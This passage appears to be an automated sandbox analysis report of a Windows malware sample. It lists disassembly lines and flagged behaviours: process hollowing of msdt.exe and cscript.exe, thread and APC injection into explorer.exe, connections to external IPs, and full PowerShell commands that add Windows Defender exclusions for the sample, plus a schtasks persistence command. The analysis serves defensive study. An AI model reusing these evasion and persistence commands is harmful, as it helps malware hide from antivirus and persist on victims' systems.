Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A08918 mov eax, dword ptr fs:[00000030h]	9_2_01A08918
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A08918 mov eax, dword ptr fs:[00000030h]	9_2_01A08918
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A9C912 mov eax, dword ptr fs:[00000030h]	9_2_01A9C912
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A36962 mov eax, dword ptr fs:[00000030h]	9_2_01A36962
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A36962 mov eax, dword ptr fs:[00000030h]	9_2_01A36962
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A36962 mov eax, dword ptr fs:[00000030h]	9_2_01A36962
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A5096E mov eax, dword ptr fs:[00000030h]	9_2_01A5096E
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A5096E mov edx, dword ptr fs:[00000030h]	9_2_01A5096E
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A5096E mov eax, dword ptr fs:[00000030h]	9_2_01A5096E
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AB4978 mov eax, dword ptr fs:[00000030h]	9_2_01AB4978
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AB4978 mov eax, dword ptr fs:[00000030h]	9_2_01AB4978
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A9C97C mov eax, dword ptr fs:[00000030h]	9_2_01A9C97C
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A90946 mov eax, dword ptr fs:[00000030h]	9_2_01A90946
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A10887 mov eax, dword ptr fs:[00000030h]	9_2_01A10887
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A9C89D mov eax, dword ptr fs:[00000030h]	9_2_01A9C89D
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01ADA8E4 mov eax, dword ptr fs:[00000030h]	9_2_01ADA8E4
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A4C8F9 mov eax, dword ptr fs:[00000030h]	9_2_01A4C8F9
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A4C8F9 mov eax, dword ptr fs:[00000030h]	9_2_01A4C8F9
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A3E8C0 mov eax, dword ptr fs:[00000030h]	9_2_01A3E8C0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AB483A mov eax, dword ptr fs:[00000030h]	9_2_01AB483A
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AB483A mov eax, dword ptr fs:[00000030h]	9_2_01AB483A
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A4A830 mov eax, dword ptr fs:[00000030h]	9_2_01A4A830
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A32835 mov eax, dword ptr fs:[00000030h]	9_2_01A32835
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A32835 mov eax, dword ptr fs:[00000030h]	9_2_01A32835
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A32835 mov eax, dword ptr fs:[00000030h]	9_2_01A32835
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A32835 mov ecx, dword ptr fs:[00000030h]	9_2_01A32835
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A32835 mov eax, dword ptr fs:[00000030h]	9_2_01A32835
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A32835 mov eax, dword ptr fs:[00000030h]	9_2_01A32835
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A9C810 mov eax, dword ptr fs:[00000030h]	9_2_01A9C810
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AA6870 mov eax, dword ptr fs:[00000030h]	9_2_01AA6870
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AA6870 mov eax, dword ptr fs:[00000030h]	9_2_01AA6870
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A9E872 mov eax, dword ptr fs:[00000030h]	9_2_01A9E872
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A9E872 mov eax, dword ptr fs:[00000030h]	9_2_01A9E872
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A22840 mov ecx, dword ptr fs:[00000030h]	9_2_01A22840
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A40854 mov eax, dword ptr fs:[00000030h]	9_2_01A40854
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A14859 mov eax, dword ptr fs:[00000030h]	9_2_01A14859
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A14859 mov eax, dword ptr fs:[00000030h]	9_2_01A14859
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A20BBE mov eax, dword ptr fs:[00000030h]	9_2_01A20BBE
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A20BBE mov eax, dword ptr fs:[00000030h]	9_2_01A20BBE
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AC4BB0 mov eax, dword ptr fs:[00000030h]	9_2_01AC4BB0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AC4BB0 mov eax, dword ptr fs:[00000030h]	9_2_01AC4BB0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A18BF0 mov eax, dword ptr fs:[00000030h]	9_2_01A18BF0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A18BF0 mov eax, dword ptr fs:[00000030h]	9_2_01A18BF0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A18BF0 mov eax, dword ptr fs:[00000030h]	9_2_01A18BF0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A9CBF0 mov eax, dword ptr fs:[00000030h]	9_2_01A9CBF0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A3EBFC mov eax, dword ptr fs:[00000030h]	9_2_01A3EBFC
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A30BCB mov eax, dword ptr fs:[00000030h]	9_2_01A30BCB
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A30BCB mov eax, dword ptr fs:[00000030h]	9_2_01A30BCB
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A30BCB mov eax, dword ptr fs:[00000030h]	9_2_01A30BCB
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A10BCD mov eax, dword ptr fs:[00000030h]	9_2_01A10BCD
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A10BCD mov eax, dword ptr fs:[00000030h]	9_2_01A10BCD
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A10BCD mov eax, dword ptr fs:[00000030h]	9_2_01A10BCD
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01ABEBD0 mov eax, dword ptr fs:[00000030h]	9_2_01ABEBD0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A3EB20 mov eax, dword ptr fs:[00000030h]	9_2_01A3EB20
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A3EB20 mov eax, dword ptr fs:[00000030h]	9_2_01A3EB20
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AD8B28 mov eax, dword ptr fs:[00000030h]	9_2_01AD8B28
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AD8B28 mov eax, dword ptr fs:[00000030h]	9_2_01AD8B28
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A8EB1D mov eax, dword ptr fs:[00000030h]	9_2_01A8EB1D
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A8EB1D mov eax, dword ptr fs:[00000030h]	9_2_01A8EB1D
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A8EB1D mov eax, dword ptr fs:[00000030h]	9_2_01A8EB1D
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A8EB1D mov eax, dword ptr fs:[00000030h]	9_2_01A8EB1D
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A8EB1D mov eax, dword ptr fs:[00000030h]	9_2_01A8EB1D
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A8EB1D mov eax, dword ptr fs:[00000030h]	9_2_01A8EB1D
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A8EB1D mov eax, dword ptr fs:[00000030h]	9_2_01A8EB1D
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A8EB1D mov eax, dword ptr fs:[00000030h]	9_2_01A8EB1D
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A8EB1D mov eax, dword ptr fs:[00000030h]	9_2_01A8EB1D
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A0CB7E mov eax, dword ptr fs:[00000030h]	9_2_01A0CB7E
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AC4B4B mov eax, dword ptr fs:[00000030h]	9_2_01AC4B4B
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AC4B4B mov eax, dword ptr fs:[00000030h]	9_2_01AC4B4B
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AB8B42 mov eax, dword ptr fs:[00000030h]	9_2_01AB8B42
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AA6B40 mov eax, dword ptr fs:[00000030h]	9_2_01AA6B40
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AA6B40 mov eax, dword ptr fs:[00000030h]	9_2_01AA6B40
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01ADAB40 mov eax, dword ptr fs:[00000030h]	9_2_01ADAB40
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01ABEB50 mov eax, dword ptr fs:[00000030h]	9_2_01ABEB50
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A18AA0 mov eax, dword ptr fs:[00000030h]	9_2_01A18AA0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A18AA0 mov eax, dword ptr fs:[00000030h]	9_2_01A18AA0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A66AA4 mov eax, dword ptr fs:[00000030h]	9_2_01A66AA4
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A1EA80 mov eax, dword ptr fs:[00000030h]	9_2_01A1EA80
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A1EA80 mov eax, dword ptr fs:[00000030h]	9_2_01A1EA80
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A1EA80 mov eax, dword ptr fs:[00000030h]	9_2_01A1EA80
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A1EA80 mov eax, dword ptr fs:[00000030h]	9_2_01A1EA80
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A1EA80 mov eax, dword ptr fs:[00000030h]	9_2_01A1EA80
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A1EA80 mov eax, dword ptr fs:[00000030h]	9_2_01A1EA80
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A1EA80 mov eax, dword ptr fs:[00000030h]	9_2_01A1EA80
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A1EA80 mov eax, dword ptr fs:[00000030h]	9_2_01A1EA80
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A1EA80 mov eax, dword ptr fs:[00000030h]	9_2_01A1EA80
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AE4A80 mov eax, dword ptr fs:[00000030h]	9_2_01AE4A80
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A48A90 mov edx, dword ptr fs:[00000030h]	9_2_01A48A90
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A4AAEE mov eax, dword ptr fs:[00000030h]	9_2_01A4AAEE
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A4AAEE mov eax, dword ptr fs:[00000030h]	9_2_01A4AAEE
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A66ACC mov eax, dword ptr fs:[00000030h]	9_2_01A66ACC
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A66ACC mov eax, dword ptr fs:[00000030h]	9_2_01A66ACC
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A66ACC mov eax, dword ptr fs:[00000030h]	9_2_01A66ACC
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A10AD0 mov eax, dword ptr fs:[00000030h]	9_2_01A10AD0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A44AD0 mov eax, dword ptr fs:[00000030h]	9_2_01A44AD0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A44AD0 mov eax, dword ptr fs:[00000030h]	9_2_01A44AD0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A4CA24 mov eax, dword ptr fs:[00000030h]	9_2_01A4CA24
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A3EA2E mov eax, dword ptr fs:[00000030h]	9_2_01A3EA2E
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A34A35 mov eax, dword ptr fs:[00000030h]	9_2_01A34A35
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A34A35 mov eax, dword ptr fs:[00000030h]	9_2_01A34A35
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A4CA38 mov eax, dword ptr fs:[00000030h]	9_2_01A4CA38
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A9CA11 mov eax, dword ptr fs:[00000030h]	9_2_01A9CA11
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A4CA6F mov eax, dword ptr fs:[00000030h]	9_2_01A4CA6F
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A4CA6F mov eax, dword ptr fs:[00000030h]	9_2_01A4CA6F
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A4CA6F mov eax, dword ptr fs:[00000030h]	9_2_01A4CA6F
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01ABEA60 mov eax, dword ptr fs:[00000030h]	9_2_01ABEA60
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A8CA72 mov eax, dword ptr fs:[00000030h]	9_2_01A8CA72
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A8CA72 mov eax, dword ptr fs:[00000030h]	9_2_01A8CA72
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A16A50 mov eax, dword ptr fs:[00000030h]	9_2_01A16A50
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A16A50 mov eax, dword ptr fs:[00000030h]	9_2_01A16A50
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A16A50 mov eax, dword ptr fs:[00000030h]	9_2_01A16A50
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A16A50 mov eax, dword ptr fs:[00000030h]	9_2_01A16A50
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A16A50 mov eax, dword ptr fs:[00000030h]	9_2_01A16A50
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A16A50 mov eax, dword ptr fs:[00000030h]	9_2_01A16A50
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A16A50 mov eax, dword ptr fs:[00000030h]	9_2_01A16A50
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A20A5B mov eax, dword ptr fs:[00000030h]	9_2_01A20A5B
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A20A5B mov eax, dword ptr fs:[00000030h]	9_2_01A20A5B
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AD8DAE mov eax, dword ptr fs:[00000030h]	9_2_01AD8DAE
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AD8DAE mov eax, dword ptr fs:[00000030h]	9_2_01AD8DAE
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AE4DAD mov eax, dword ptr fs:[00000030h]	9_2_01AE4DAD
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A46DA0 mov eax, dword ptr fs:[00000030h]	9_2_01A46DA0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A4CDB1 mov ecx, dword ptr fs:[00000030h]	9_2_01A4CDB1
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A4CDB1 mov eax, dword ptr fs:[00000030h]	9_2_01A4CDB1
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A4CDB1 mov eax, dword ptr fs:[00000030h]	9_2_01A4CDB1

Source: C:\Users\user\Desktop\po8909893299832.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\po8909893299832.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 103.224.212.212 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.92.138.115 80
Source: C:\Windows\explorer.exe	Network Connect: 216.246.47.89 80

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\po8909893299832.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\po8909893299832.exe"
Source: C:\Users\user\Desktop\po8909893299832.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe"
Source: C:\Users\user\Desktop\po8909893299832.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\po8909893299832.exe"	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\po8909893299832.exe	Memory written: C:\Users\user\Desktop\po8909893299832.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Memory written: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe base: 400000 value starts with: 4D5A			Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\po8909893299832.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Section loaded: NULL target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Section loaded: NULL target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\po8909893299832.exe	Thread register set: target process: 4084	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Thread register set: target process: 4084
Source: C:\Windows\SysWOW64\cscript.exe	Thread register set: target process: 4084

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\po8909893299832.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\po8909893299832.exe	Section unmapped: C:\Windows\SysWOW64\msdt.exe base address: 1B0000			Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Section unmapped: C:\Windows\SysWOW64\cscript.exe base address: 2D0000

Source: C:\Users\user\Desktop\po8909893299832.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\po8909893299832.exe"	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe"	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\InXlDTKncKkCk" /XML "C:\Users\user\AppData\Local\Temp\tmp6E21.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Process created: C:\Users\user\Desktop\po8909893299832.exe "C:\Users\user\Desktop\po8909893299832.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\InXlDTKncKkCk" /XML "C:\Users\user\AppData\Local\Temp\tmp7E6D.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process created: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe "C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process created: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe "C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe"

Source: explorer.exe, 0000000A.00000002.2426276889.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.1484011745.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1445045558.000000000936E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000A.00000000.1427561954.0000000001091000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000002.2418797394.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1427258598.0000000000A28000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000A.00000000.1427561954.0000000001091000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: 0Program Manager
Source: explorer.exe, 0000001C.00000002.3853757556.0000000000D87000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 0Progman
Source: explorer.exe, 0000000A.00000000.1427561954.0000000001091000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 0000000A.00000002.2426276889.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.1484011745.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1445045558.000000000936E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd]1Q

Source: C:\Users\user\Desktop\po8909893299832.exe	Queries volume information: C:\Users\user\Desktop\po8909893299832.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
